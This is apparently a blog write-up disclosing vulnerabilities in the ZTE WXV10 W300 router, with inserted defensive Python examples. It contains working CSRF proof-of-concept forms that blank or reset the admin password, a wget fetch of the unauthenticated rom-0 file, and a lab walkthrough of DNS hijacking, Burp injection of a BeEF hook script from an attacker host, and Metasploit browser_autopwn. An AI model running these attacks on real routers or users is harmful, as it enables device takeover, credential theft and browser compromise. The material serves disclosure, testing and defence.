ZTE WXV10 W300 Multiple Vulnerabilities

Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant, "admin", and the password by default is "admin".

ROM-0 Backup File Disclosure (CVE-2014-4019)

The rom-0 backup file contains sensitive information such as the passwords, and it is disclosed: anyone can download that file without any authentication using a simple GET request.

http://192.168.1.1/rom-0

You can find the router password using my rom-0 configuration decompressor.


PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)

If you look at the frame source in the "Internet" tab under "Interface Setup" you can see this doLoad function at line 542, which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.

[code language="javascript" highlight="12"]
function doLoad() {
    var value = document.forms[0].wanTypeRadio[2].checked;
    doEnable();
    QosCheck();
    WANChkIdleTimeT();
    if (value)
        pppStaticCheck();
    LockWhenPVC0();
    LockPVC();
    if (document.forms[0].wan_PPPPassword != null)
    {
        document.forms[0].wan_PPPPassword.value = pwdppp;
    }
}
[/code]

The "pwdppp" variable is loaded from an external file, which you can see included at the bottom of the page.

[code language="javascript"]
<script language="javascript" src="/basic/tc2wanfun.js"></script>
[/code]

Once the user has authenticated to the router, the password stays written in that external JS file until the next successful restart.


Admin Password Manipulation XSRF (CVE-2014-4155)

You can change the password to blank by requesting /Forms/tools_admin_1 with a GET request carrying HTTP basic authentication.

POC:

[code language="html"]
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
[/code]

If you send something like the above to the victim, he will be prompted for the login, and once he enters his credentials his password will immediately be changed to a blank password.
Of course, since there is no XSRF token in the request, you can change the password to whatever you wish.
POC:

[code language="html"]
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
    <input type="hidden" name="uiViewTools_Password" value="your_passwd" />
    <input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
    <script>document.exploit.submit();</script>
</form>
</body>
</html>
[/code]
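To make the root cause concrete, here is an added example (written for this page, not code from the router firmware or from the original post) that models the /Forms/tools_admin_1 handler in plain Python. The first function reproduces the behaviour described above: any authenticated request, GET or POST, overwrites the stored password with whatever `uiViewTools_Password` was sent, so a GET with no fields blanks it. The second is the hardened form a firmware developer would want: POST only, a per-session anti-CSRF token compared in constant time, proof of the current password, and a non-empty, confirmed new value. The `Session`/`Router` classes, the `csrf_token` and `current_password` field names and the minimum length are assumptions for the example.

```python
"""Vulnerable vs. hardened password-change handler, modelling /Forms/tools_admin_1."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class Session:
    """Server-side state for one logged-in admin (constructed for this example)."""
    authenticated: bool = True
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Router:
    """The only state that matters here: the admin password (default from CVE-2014-4018)."""
    admin_password: str = "admin"


def change_password_vulnerable(router: Router, session: Session,
                               method: str, form: Dict[str, str]) -> str:
    """Behaviour the post describes: the HTTP method is never checked, no anti-CSRF
    token exists, and a missing field is treated as an empty new password."""
    if not session.authenticated:
        return "401 Unauthorized"
    router.admin_password = form.get("uiViewTools_Password", "")
    return "200 OK"


def change_password_hardened(router: Router, session: Session,
                             method: str, form: Dict[str, str],
                             min_len: int = 8) -> str:
    """A state-changing request must be a POST, carry this session's anti-CSRF token,
    prove knowledge of the current password and supply a confirmed new one."""
    if not session.authenticated:
        return "401 Unauthorized"
    if method != "POST":
        return "405 Method Not Allowed"
    # compare_digest avoids leaking the token or password through timing differences
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return "403 Forbidden"
    if not hmac.compare_digest(form.get("current_password", ""), router.admin_password):
        return "403 Forbidden"
    new_pw = form.get("uiViewTools_Password", "")
    if len(new_pw) < min_len or new_pw != form.get("uiViewTools_PasswordConfirm"):
        return "400 Bad Request"
    router.admin_password = new_pw
    session.csrf_token = secrets.token_hex(16)  # single-use token: rotate after success
    return "200 OK"


if __name__ == "__main__":
    r, s = Router(), Session()
    print("vulnerable, GET, no fields:", change_password_vulnerable(r, s, "GET", {}),
          "-> password is now", repr(r.admin_password))
    r, s = Router(), Session()
    print("hardened, GET, no fields:", change_password_hardened(r, s, "GET", {}))
```

The token check alone defeats the iframe and auto-submitting form shown above, because a third-party page cannot read the victim's session token; rejecting GET closes the "blank password from a bare request" case even where the token check is somehow bypassed.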

Denial Of Service

You can see my previous post about this vulnerability and exploit.

ZTE and TP-Link RomPager DoS


http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737

Compromising the System

In here I am considering the scope of the router only. So after exploiting the router, what can we do in the post-exploitation phase? There are many things you can do; out of them I will be demonstrating DNS interception. Before reading this, here is a small disclaimer from me. I will not show you how to configure this using your external IP; you have to figure that out by yourself. I take no responsibility for any kind of damage you cause. Use these tools and methodologies for penetration testing, research and educational purposes only. To an untrained eye this might look like something illegal, using hacking tools to harm people. These tools are used in penetration testing and it is your sole responsibility to use them for ethical purposes without harming anyone. You can practice these in your home virtual lab.

In penetration testing there can be many methods to accomplish one task. It's the tester's creativity that puts the resources to effective use. I will be using a DNS proxy (DNSChef), a web server for forwarding requests (webmitm), an intercepting proxy (Burp Suite), and BeEF and Metasploit for compromising the victim.

Attacking machines:

  • Kali Linux - 192.168.1.4
  • Windows 8 - 192.168.1.6

Victim:

  • Windows XP - 192.168.1.5

Let's do an nmap scan first.

[code language="bash"]
nmap -sV -sS -vv -T5 -p80 -oG - 192.168.1.1
[/code]

  • -sV - Version scan
  • -sS - SYN scan
  • -vv - Verbose mode; I am giving it twice here
  • -T5 - Very aggressive timing
  • -p - The port
  • -oG - Grepable output; if we are scanning a large subnet this comes in handy for filtering out only the 'RomPager' routers
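The grepable format is what makes the filtering above practical, so here is an added example (mine, not from the post) of a small parser for `-oG` output that pulls out every host whose open port 80 reports a RomPager banner, the way an asset owner would inventory affected devices on their own network. The scan text embedded below is constructed, not a real capture; the addresses and the banners are hypothetical, and the one nmap-specific convention it relies on is that `-oG` writes `|` in place of `/` inside the version field.

```python
"""Pick out hosts running the RomPager embedded web server from nmap grepable (-oG) output."""
import re
from typing import Dict, List

# Constructed sample of `nmap -sV -p80 -oG -` output for a small LAN; not a real scan.
# Each Ports entry is port/state/proto/owner/service/rpc/version/ and nmap escapes
# slashes inside the version field as '|'.
SAMPLE_OG = """\
# Nmap 6.46 scan initiated Sat Jun 21 10:00:00 2014 as: nmap -sV -sS -vv -T5 -p80 -oG - 192.168.1.0/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0/\tIgnored State: closed (0)
Host: 192.168.1.4 ()\tStatus: Up
Host: 192.168.1.4 ()\tPorts: 80/open/tcp//http//Apache httpd 2.2.22 ((Debian))/
Host: 192.168.1.5 ()\tStatus: Up
Host: 192.168.1.5 ()\tPorts: 80/closed/tcp//http///
Host: 192.168.1.254 (gateway2.lan)\tPorts: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0/
# Nmap done at Sat Jun 21 10:00:05 2014 -- 256 IP addresses (4 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)")


def parse_grepable(text: str) -> List[Dict]:
    """Parse -oG lines into records: {ip, name, ports: [{port, state, proto, service, version}]}."""
    hosts = []
    for line in text.splitlines():
        if line.startswith("#") or "\tPorts:" not in line:
            continue  # comment lines and Status-only lines carry no port data
        m = HOST_RE.match(line)
        if not m:
            continue
        # tab-separated "Key: value" fields: Host, Ports, Ignored State, ...
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ports = []
        for entry in fields["Ports"].split(", "):
            parts = entry.rstrip("/").split("/")
            parts += [""] * (7 - len(parts))  # closed ports omit the trailing fields
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            ports.append({"port": int(port), "state": state, "proto": proto,
                          "service": service, "version": version.replace("|", "/")})
        hosts.append({"ip": m.group("ip"), "name": m.group("name"), "ports": ports})
    return hosts


def rompager_hosts(text: str) -> List[str]:
    """IPs whose open port 80 advertises RomPager, the embedded server on these units."""
    found = []
    for host in parse_grepable(text):
        for p in host["ports"]:
            if p["port"] == 80 and p["state"] == "open" and "rompager" in p["version"].lower():
                found.append(host["ip"])
                break
    return found


if __name__ == "__main__":
    for ip in rompager_hosts(SAMPLE_OG):
        print(ip)
```

Feed it the file produced by `-oG somefile` (or pipe `-oG -` output into it) and the result is a list of addresses to check against the firmware advisory rather than a wall of scan text.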



Next based upon the above vulnerabilities you can get inside the router. We can get the rom-0 file by using wget since it requires just a GET request.

[code language="bash"]
wget http://192.168.1.1/rom-0 -O rom0
[/code]

After that you can use my decompressor to get the router's password.



Now let's start our DNS proxy.

[code language="bash"]
dnschef --interface 192.168.1.4 --fakeip 192.168.1.4
[/code]


  • --interface - By default it listens on localhost for security reasons; we specify the interface to listen on
  • --fakeip - Fakes all replies to point to 192.168.1.4

Next we need to set up a small web server which can handle HTTP and HTTPS requests. I will be using webmitm, a tool from the dsniff bundle. By default it forwards the data to the real sites; instead we need to forward the requests to our intercepting proxy, Burp.

[code language="bash"]
webmitm -d 192.168.1.6
[/code]

  • -d for debugging purposes




We need to change the router's primary DNS to our attacking machine. You can change the DNS settings either through the web interface or over telnet.



Using telnet, type:

[code language=”html”]
set lan dhcpdns [attacker machine] 8.8.8.8
[/code]


I am using 8.8.8.8 as the secondary DNS so that compromised hosts don't keep requesting from us again and again; instead they will request from Google.

After configuring the tools and the DNS we need to configure Burp. I am running Burp on a separate machine because webmitm has already taken ports 80 and 443. We need Burp to bind to ports 80 and 443 on all interfaces and listen for all incoming connections. We are going to use invisible proxying, since it allows non-proxy-aware clients to connect directly to a proxy listener.
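The DNS change and the `--fakeip` answers both leave fingerprints a LAN client can check for itself. The following is an added example (not from the post, not from DNSChef) of three such checks: DHCP handed out a resolver that is not on the site's allowlist, one address is answering for many unrelated names, and names that a reference resolver maps to public addresses come back private from the LAN resolver. The lease contents, the allowlist and both sets of answers are constructed inline; in practice they would come from the DHCP lease file and from querying the two resolvers.

```python
"""Heuristics for spotting dnschef-style DNS interception from a LAN client's point of view."""
import ipaddress
from collections import Counter
from typing import Dict, Iterable, List

# Constructed observations (not captured from a real network): the DNS servers the
# router's DHCP lease advertised, and an assumed allowlist for this site.
DHCP_DNS_OFFERED = ["192.168.1.4", "8.8.8.8"]
EXPECTED_DNS = {"192.168.1.1", "8.8.8.8", "8.8.4.4"}

# Constructed answers for the same names from the advertised primary resolver (LAN)
# and from a reference resolver reached out of band; the public addresses are made up.
LAN_ANSWERS = {
    "www.example.com": "192.168.1.4",
    "mail.example.org": "192.168.1.4",
    "update.example.net": "192.168.1.4",
    "intranet.lan": "192.168.1.10",
}
REF_ANSWERS = {
    "www.example.com": "93.184.216.34",
    "mail.example.org": "93.184.216.35",
    "update.example.net": "93.184.216.36",
    "intranet.lan": "192.168.1.10",
}


def unexpected_dns_servers(offered: Iterable[str], allowlist: Iterable[str]) -> List[str]:
    """Resolvers handed out by DHCP that are not on the allowlist; a `set lan dhcpdns`
    change to an attacker-controlled host shows up here."""
    allowed = set(allowlist)
    return [s for s in offered if s not in allowed]


def sinkhole_candidates(answers: Dict[str, str], min_names: int = 3) -> List[str]:
    """Addresses returned for at least `min_names` unrelated names: the signature of --fakeip."""
    counts = Counter(answers.values())
    return sorted(ip for ip, n in counts.items() if n >= min_names)


def hijacked_names(lan: Dict[str, str], ref: Dict[str, str]) -> List[str]:
    """Names the LAN resolver maps to a private address while the reference resolver
    maps them to a public one. Internal names that agree on both sides are left alone."""
    flagged = []
    for name, lan_ip in lan.items():
        ref_ip = ref.get(name)
        if ref_ip is None or lan_ip == ref_ip:
            continue
        if ipaddress.ip_address(lan_ip).is_private and not ipaddress.ip_address(ref_ip).is_private:
            flagged.append(name)
    return sorted(flagged)


def assess(offered, allowlist, lan, ref) -> Dict[str, List[str]]:
    """Run the three checks and return one report."""
    return {
        "unexpected_servers": unexpected_dns_servers(offered, allowlist),
        "sinkholes": sinkhole_candidates(lan),
        "hijacked": hijacked_names(lan, ref),
    }


if __name__ == "__main__":
    for key, value in assess(DHCP_DNS_OFFERED, EXPECTED_DNS, LAN_ANSWERS, REF_ANSWERS).items():
        print(f"{key}: {value}")
```

The second check is the cheapest to run continuously: a resolver that hands the same RFC 1918 address to a mail host, a software update host and a news site is not resolving anything, it is redirecting.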

Let's start the Browser Exploitation Framework on Kali.



Now we need to inject our hook.js into the browser. For this purpose we set Burp to inject this script into each response it intercepts. I'll replace the </head> tag using

[code language="html"]
<script src="http://192.168.1.4:3000/hook.js"></script></head>
[/code]



I am replacing the tag with our malicious JS payload. Now Burp will inject our payload into each webpage 🙂

Well, that is it! Let's browse using the victim machine and see. We can see all the requests being forwarded to us, and since we are using Burp we can intercept them. You can leave intercept off and view the HTTP History at any time.
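The injection described above also has a signature on the wire: a page served by a public host suddenly loads a script from a literal LAN address. As an added example (mine, not part of the post or of BeEF), here is a check that could run over HTTP response bodies captured by a proxy or IDS at the network edge and flag exactly that. The response body below is constructed to look like the page after the </head> replacement; `page_host` and the `trusted_hosts` allowlist are assumptions of the example.

```python
"""Flag an injected <script> pointing at a private address inside an HTML response from a public site."""
import ipaddress
from html.parser import HTMLParser
from typing import List, Sequence
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def script_srcs(html: str) -> List[str]:
    """All external script URLs referenced by the document."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def suspicious_script_srcs(html: str, page_host: str, trusted_hosts: Sequence[str] = ()) -> List[str]:
    """External scripts fetched from a literal private, loopback or link-local address.
    A page from a public host has no reason to load code from 192.168.x.x; that is the
    pattern a proxy-side </head> replacement with a hook script produces."""
    hits = []
    for src in script_srcs(html):
        host = urlsplit(src).hostname  # strips scheme, port and path; None for relative URLs
        if not host or host == page_host or host in trusted_hosts:
            continue
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue  # a hostname rather than an IP literal: left to allowlist policy
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            hits.append(src)
    return hits


# Constructed response body (not a real capture) as the victim's browser would receive it.
INJECTED_PAGE = """<html><head><title>News</title>
<script src="https://www.example.com/static/app.js"></script>
<script src="http://192.168.1.4:3000/hook.js"></script></head>
<body><p>hello</p><script src="//cdn.example.net/lib.js"></script></body></html>"""

if __name__ == "__main__":
    print(suspicious_script_srcs(INJECTED_PAGE, "www.example.com"))
```

The same idea extends to any script whose host is outside the site's known content hosts, but the private-address rule needs no allowlist at all and catches the lab setup shown here directly.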



Let's check the page source to confirm that Burp correctly injected our hook.js.



It has been successfully injected; now let's check the UI of BeEF.



There are many things you can do with the browser. For the sake of this post let's send a simple alert box and check.




Now, how to compromise the system? There are many methods to do it. I will start browser_autopwn and inject it via an invisible iframe into browsers using BeEF 😉

Let's start browser_autopwn using Metasploit.



Inject using BeEF’s invisible frame.



And w00t! I got 7 sessions for Windows XP, ha 😀 This is due to the successful exploitation of 7 exploits.



Here is a small video I made.

Hope you enjoyed this write-up 😉
http://packetstormsecurity.com/files/127129/ZTE-WXV10-W300-Disclosure-CSRF-Default.html
http://www.exploit-db.com/exploits/33803
http://www.routerpwn.com/ZTE/

9 thoughts on "ZTE WXV10 W300 Multiple Vulnerabilities"

  1. It’s really nice how you see things differently. Great Article machan keep it up :DDD hats off
